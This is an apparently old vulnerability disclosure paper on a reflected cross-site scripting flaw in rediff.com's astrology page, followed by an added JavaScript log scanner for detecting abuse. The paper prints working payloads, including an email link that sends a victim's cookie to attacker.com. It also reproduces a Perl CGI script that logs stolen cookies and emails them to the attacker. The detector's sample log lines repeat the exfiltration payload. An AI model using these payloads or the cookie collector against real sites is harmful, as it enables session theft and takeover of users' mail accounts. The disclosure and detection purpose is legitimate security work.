XSS vulnerability @ rediff.com

BY MOHIT JOSHI



Warning & Disclaimer
The problem described here existed as of the date of writing this paper. The author has only analyzed a possible situation by viewing the source code. The author makes no guarantee as to whether this situation can be exploited or not. In addition, the author is not responsible for your activities. Nothing I did was illegal, but if you break into somebody's account, that is against the law. This document is being published so that Rediff can take corrective measures and prevent the situation from being exploited.


Anatomy of (possible) Attack
What is described here is the classical case of an XSS (Cross Site Scripting) vulnerability. This paper does not intend to teach you what XSS is, as there are numerous papers available online for that purpose.
So let's begin by going to the main page of rediff.com (http://in.rediff.com/index.html), which generally looks like this.


Now, if you view the source code of this page in your favourite browser, you'll find the following JavaScript embedded in it.


<SCRIPT language="JavaScript" type="text/javascript">
signname = new Array ('Aquarius','Pisces','Aries','Taurus','Gemini','Cancer','Leo','Virgo','Libra','Scorpio','Sagittarius','Capricorn');
function showdaily() {
sign = document.pred.sign.options[document.pred.sign.selectedIndex].value;
var wind=window.open("http://astrology.rediff.com/sections/daily/daily.asp?sign="+sign,"RediffDaily","toolbars=no,directory=no,scrolling=no,scrollbars=yes,maximize=null,width=520,height=423");
}
function openscore(fileName) {
window.open(fileName,"scorepop","top=2,left=2,toolbars=no,maximize=no,resize=no,width=385,height=380,location=no,directories=no,scrollbars=no");
}
function PasswdRemindWin() {
window.open("http://login.rediff.com/cgi-bin/passwd_remind.cgi?FormName=showlogin","win1","toolbar=no,directories=no,resize=yes,menubar=no,location=no,scrollbars=yes,width=490,height=480,maximize=null,top=70,left=80");
}
</SCRIPT>

What is of interest to us is the function showdaily. Observe carefully what happens when this function is executed. Depending on the user input (normally made by clicking a link on the browser screen), one of the sun sign values is assigned to the variable sign. On receiving this value, a new window pops up. The URL provided to this new window is the following:

http://astrology.rediff.com/sections/daily/daily.asp?sign="+sign

The new window that opens up typically looks like this:



So, as you can see, the new window details the fortunes of the Cancer sign, ironically messing up its own. Now I'll show you how.
The problem here is actually the most common one: improper input string validation. The people who coded this assumed that the user will always enter one of the sun sign values, because they also assumed that the user will only follow links on the browser. Thus they did not feel the need to filter the data sent by the user. This is of course not true. If you observe the above screenshot carefully, you'll see that the name of the sun sign appears in the window ("Dear, cancer"). From this we infer that the user can send an arbitrary sign value and it will be printed. Also, since no filtering of this data is done, it is possible to pass malicious data too. An example is shown below:

http://astrology.rediff.com/sections/daily/daily.asp?sign= <script>alert(document.cookie)</script>

There are many possible variants of the above URL. What it basically does is embed a script tag in our astrology page. When this script is executed, it displays the user's cookie. Nothing more needs to be said to those who know how to exploit XSS. For the rest of you, this is how it is done.
The aim is to steal the user's cookie. Now consider a user who is viewing his mail at rediff. If the attacker can steal the user's active cookie, then he can access the user's mailbox and even reset the password. This is accomplished by sending the user a mail that contains the following link.

<a href="http://astrology.rediff.com/sections/daily/daily.asp?sign=<script>document.location.replace('http://attacker.com/steal.cgi?'+document.cookie);</script>">This will steal your cookie</a>

attacker.com is the website owned by the attacker, where he places a script that records the value of this cookie. The attacker then uses this cookie value to access the user's mailbox. One such script is shown below. It has been borrowed from an excellent paper by David Endler titled "The Evolution of Cross-Site Scripting Attacks", and I would suggest that you read it if you are not aware of XSS attacks (and this entire paper has gone over your head). That paper also gives details of how to automate such an attack. Here is the script:

#!/usr/bin/perl
# steal.cgi by David Endler dendler@idefense.com
# Specific to your system
$mailprog = '/usr/sbin/sendmail';
# create a log file of cookies, we'll also email them too
open(COOKIES,">>stolen_cookie_file");
# what the victim sees, customize as needed
print "Content-type:text/html\n\n";
print <<EndOfHTML;
<html><head><title>Cookie Stealing</title></head>
<body>
Your Cookie has been stolen. Thank you.
</body></html>
EndOfHTML
# The QUERY_STRING environment variable should be filled with
# the cookie text after steal.cgi:
# http://www.attacker.com/steal.cgi?XXXXX
print COOKIES "$ENV{'QUERY_STRING'} from $ENV{'REMOTE_ADDR'}\n";
# now email the alert as well so we can start to hijack
open(MAIL,"|$mailprog -t");
print MAIL "To: attacker\@attacker.com\n";
print MAIL "From: cookie_steal\@attacker.com\n";
print MAIL "Subject: Stolen Cookie Submission\n\n";
print MAIL "-" x 75 . "\n\n";
print MAIL "$ENV{'QUERY_STRING'} from $ENV{'REMOTE_ADDR'}\n";
close (MAIL);


This script also alerts the attacker by sending him an e-mail every time a cookie is stolen. There are numerous ways of carrying out this kind of XSS attack. What this paper has shown is the possibility of such an attack on rediff. I hope this information will be used properly and not to cause any damage.
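From the defending side, the reflection described in this paper leaves a clear trace in the web server's access log: every abuse of it is a request to daily.asp whose sign value is not one of the twelve expected names. The following is an added example (not part of the original paper, and not rediff's tooling) that scans constructed sample log lines in the common Apache/NGINX combined format and flags such requests; the field layout and the function names are assumptions.

```javascript
// Added example, not from the original page: flag requests that abuse the
// `sign` parameter of daily.asp in web-server access logs. The log lines
// below are constructed samples; the format assumed is the combined log.

const ALLOWED_SIGNS = new Set(['aquarius', 'pisces', 'aries', 'taurus',
  'gemini', 'cancer', 'leo', 'virgo', 'libra', 'scorpio', 'sagittarius',
  'capricorn']);

// Minimal combined-log parser: client IP, method, request path, status.
const LOG_RE = /^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})/;

function parseLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], method: m[2], path: m[3], status: Number(m[4]) };
}

// Pull the `sign` value out of the request path. Splits on the first '?'
// and first '=' only, because the payload itself may contain both, and
// tolerates malformed percent-encoding by returning the raw value.
function signParam(path) {
  const qIdx = path.indexOf('?');
  if (qIdx < 0) return null;
  for (const kv of path.slice(qIdx + 1).split('&')) {
    const eq = kv.indexOf('=');
    const k = eq < 0 ? kv : kv.slice(0, eq);
    const v = eq < 0 ? '' : kv.slice(eq + 1);
    if (k === 'sign') {
      try {
        return decodeURIComponent(v.replace(/\+/g, ' ')).trim();
      } catch (e) {
        return v;
      }
    }
  }
  return null;
}

// A request is suspicious when it hits daily.asp with a sign value outside
// the allowlist. The allowlist is the detection; the markup test only
// labels the finding so an analyst can triage quickly.
function classify(entry) {
  if (!entry || !entry.path.toLowerCase().includes('/daily.asp')) return null;
  const sign = signParam(entry.path);
  if (sign === null || ALLOWED_SIGNS.has(sign.toLowerCase())) return null;
  const looksLikeMarkup = /<|>|javascript:|on\w+\s*=/i.test(sign);
  return {
    ip: entry.ip,
    sign,
    reason: looksLikeMarkup ? 'markup in sign parameter' : 'sign not in allowlist',
  };
}

function scanLog(lines) {
  return lines.map(parseLine).map(classify).filter(Boolean);
}

// Constructed sample log: one normal request, two reflecting the page's
// payloads, one merely unexpected value, and one unrelated request.
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Oct/2004:13:55:36 +0530] "GET /sections/daily/daily.asp?sign=cancer HTTP/1.1" 200 5123 "-" "Mozilla/4.0"',
  '203.0.113.5 - - [10/Oct/2004:13:56:01 +0530] "GET /sections/daily/daily.asp?sign=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 5201 "-" "Mozilla/4.0"',
  '198.51.100.9 - - [10/Oct/2004:13:57:12 +0530] "GET /sections/daily/daily.asp?sign=%3Cscript%3Edocument.location.replace(%27http://attacker.example/steal.cgi?%27%2Bdocument.cookie)%3C/script%3E HTTP/1.1" 200 5250 "http://mail.rediff.com/" "Mozilla/4.0"',
  '198.51.100.9 - - [10/Oct/2004:13:58:40 +0530] "GET /sections/daily/daily.asp?sign=ophiuchus HTTP/1.1" 200 5100 "-" "Mozilla/4.0"',
  '192.0.2.77 - - [10/Oct/2004:13:59:02 +0530] "GET /index.html HTTP/1.1" 200 9000 "-" "Mozilla/4.0"',
];

for (const hit of scanLog(SAMPLE_LOG)) console.log(hit);
```

Because the detection is "value not in the allowlist" rather than "value contains a script tag", it also catches encoded or obfuscated variants that a signature for the literal <script> string would miss; the Referer field in the third sample line (a webmail page) is the kind of context that tells an analyst the link arrived by mail, as the paper describes.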


MOHIT JOSHI
e-mail: mohitDOTjoshiDOTmjATgmailDOTcom